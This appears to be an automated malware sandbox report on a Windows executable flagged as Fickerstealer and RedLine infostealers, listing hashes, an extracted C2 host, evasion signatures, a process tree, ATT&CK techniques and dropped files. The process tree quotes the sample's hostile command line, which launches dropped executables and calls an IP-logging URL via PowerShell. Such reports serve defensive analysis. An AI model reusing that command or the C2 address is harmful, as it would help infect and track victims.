Overview

overview

10

Static

static

1

7a9684f0e6...ed.exe

windows7_x64

10

7a9684f0e6...ed.exe

windows10-2004_x64

10

Analysis

  • max time kernel
    168s
  • max time network
    180s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    15-02-2022 12:04

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe

  • Size

    3.0MB

  • MD5

    c0786eaf915a205bb066e598e5418c6b

  • SHA1

    8440f9408fa74c88fad34977ca1ac639c1f5ef2e

  • SHA256

    7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed

  • SHA512

    4ecad942db3dc06da1c6c158e850eb7460bd4e3ba51e6abb304fec81cbd27aff475e9e3df37043de0dbc4f757b03a1588eb13c560a687c8d039a41bc6667c2c4

Score
10/10
fickerstealerredlineevasioninfostealerthemidatrojan

Malware Config

Extracted

Family

fickerstealer

C2

game2030.site:80

Signatures

  • Fickerstealer

    Ficker is an infostealer written in Rust and ASM.

    infostealerfickerstealer
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 1 IoCs
  • .NET Reactor proctector 1 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
    evasion
  • Executes dropped EXE 3 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 1 IoCs
  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 49 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe
    "C:\Users\Admin\AppData\Local\Temp\7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1224
    • C:\Windows\SysWOW64\cmd.exe
      "cmd" /c start "" "MMP1.exe" & start "" "Ww.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1BHHn7"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2012
      • C:\Users\Admin\AppData\Local\Temp\MMP1.exe
        "MMP1.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:2592
        • C:\Users\Admin\AppData\Local\Temp\MMP1.exe
          "MMP1.exe"
          4⤵
          • Executes dropped EXE
          PID:3420
      • C:\Users\Admin\AppData\Local\Temp\Ww.exe
        "Ww.exe"
        3⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Checks whether UAC is enabled
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        PID:2252
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1BHHn7"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1800
  • C:\Windows\system32\MusNotifyIcon.exe
    %systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 13
    1⤵
    • Checks processor information in registry
    PID:1868
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k NetworkService -p
    1⤵
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    PID:1248
  • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
    C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
    1⤵
    • Drops file in Windows directory
    • Suspicious use of AdjustPrivilegeToken
    PID:3868

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

1
T1497

Credential Access

Discovery

Query Registry

3
T1012

Virtualization/Sandbox Evasion

1
T1497

System Information Discovery

4
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\MMP1.exe
    MD5

    5ca7fa3d1d1efdffada437068eccbd4e

    SHA1

    0204b4435a79e1d3ce325706801ba3687e86dccf

    SHA256

    8eb80516c235524eac32db0f1ff1aa1a327ebe6ce1d2ec3f259c9358cda6e80b

    SHA512

    15ace6e0f384fb4f228faf49942aeced299200807a00829c8530fa1bc0408ee2de8a44a07dd9e823b7f90dd06dbeddda4934ecf4f0083173f8648c3833f8c13d

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\MMP1.exe
    MD5

    5ca7fa3d1d1efdffada437068eccbd4e

    SHA1

    0204b4435a79e1d3ce325706801ba3687e86dccf

    SHA256

    8eb80516c235524eac32db0f1ff1aa1a327ebe6ce1d2ec3f259c9358cda6e80b

    SHA512

    15ace6e0f384fb4f228faf49942aeced299200807a00829c8530fa1bc0408ee2de8a44a07dd9e823b7f90dd06dbeddda4934ecf4f0083173f8648c3833f8c13d

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\MMP1.exe
    MD5

    5ca7fa3d1d1efdffada437068eccbd4e

    SHA1

    0204b4435a79e1d3ce325706801ba3687e86dccf

    SHA256

    8eb80516c235524eac32db0f1ff1aa1a327ebe6ce1d2ec3f259c9358cda6e80b

    SHA512

    15ace6e0f384fb4f228faf49942aeced299200807a00829c8530fa1bc0408ee2de8a44a07dd9e823b7f90dd06dbeddda4934ecf4f0083173f8648c3833f8c13d

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\Ww.exe
    MD5

    e58d740f792702828c45ebfb73c8a95d

    SHA1

    8eeb2a9357aa57affb56cc938342d3dd7bb6f0c9

    SHA256

    ebc182b1f61f415d16d1a6b43c3250f290633b1a297916911166a078c80ddd10

    SHA512

    9152981670830fcc732464c4e21dc7d1af9cd6d8856601782a6166a2b81f031a2c6463fc89fdbd760bfb207861725587d80f872785441ab69d108758c9c5a8f8

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\nsa7ECE.tmp\JHILLSVZFH1MBP.dll
    MD5

    293165db1e46070410b4209519e67494

    SHA1

    777b96a4f74b6c34d43a4e7c7e656757d1c97f01

    SHA256

    49b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a

    SHA512

    97012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19

    Download Submit
  • memory/1800-157-0x00000000077C0000-0x00000000077E2000-memory.dmp
    Filesize

    136KB

    Download
  • memory/1800-150-0x00000000071A0000-0x00000000071D6000-memory.dmp
    Filesize

    216KB

    Download
  • memory/1800-164-0x0000000008AD0000-0x0000000008AEA000-memory.dmp
    Filesize

    104KB

    Download
  • memory/1800-163-0x0000000009DD0000-0x000000000A44A000-memory.dmp
    Filesize

    6.5MB

    Download
  • memory/1800-162-0x0000000007335000-0x0000000007337000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1800-161-0x0000000008080000-0x000000000809E000-memory.dmp
    Filesize

    120KB

    Download
  • memory/1800-159-0x0000000008010000-0x0000000008076000-memory.dmp
    Filesize

    408KB

    Download
  • memory/1800-158-0x0000000007FA0000-0x0000000008006000-memory.dmp
    Filesize

    408KB

    Download
  • memory/1800-152-0x0000000007970000-0x0000000007F98000-memory.dmp
    Filesize

    6.2MB

    Download
  • memory/1800-147-0x00000000738CE000-0x00000000738CF000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1800-151-0x0000000007332000-0x0000000007333000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1800-149-0x0000000007330000-0x0000000007331000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2252-142-0x0000000077164000-0x0000000077166000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2252-160-0x00000000058A0000-0x00000000058DC000-memory.dmp
    Filesize

    240KB

    Download
  • memory/2252-146-0x00000000738CE000-0x00000000738CF000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2252-153-0x00000000060B0000-0x00000000066C8000-memory.dmp
    Filesize

    6.1MB

    Download
  • memory/2252-154-0x0000000003620000-0x0000000003632000-memory.dmp
    Filesize

    72KB

    Download
  • memory/2252-155-0x0000000005A90000-0x0000000005B9A000-memory.dmp
    Filesize

    1.0MB

    Download
  • memory/2252-156-0x0000000005A80000-0x0000000005A81000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2252-139-0x0000000076DD0000-0x0000000076DD1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2252-140-0x0000000076DD0000-0x0000000076DD1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2252-148-0x0000000000BC0000-0x0000000001324000-memory.dmp
    Filesize

    7.4MB

    Download
  • memory/2592-135-0x0000000003FB0000-0x0000000003FF7000-memory.dmp
    Filesize

    284KB

    Download
  • memory/2592-133-0x00000000024E9000-0x0000000002511000-memory.dmp
    Filesize

    160KB

    Download
  • memory/2592-134-0x00000000024E9000-0x0000000002511000-memory.dmp
    Filesize

    160KB

    Download
  • memory/3420-141-0x0000000000400000-0x000000000044F000-memory.dmp
    Filesize

    316KB

    Download
  • memory/3420-137-0x0000000000400000-0x000000000044F000-memory.dmp
    Filesize

    316KB

    Download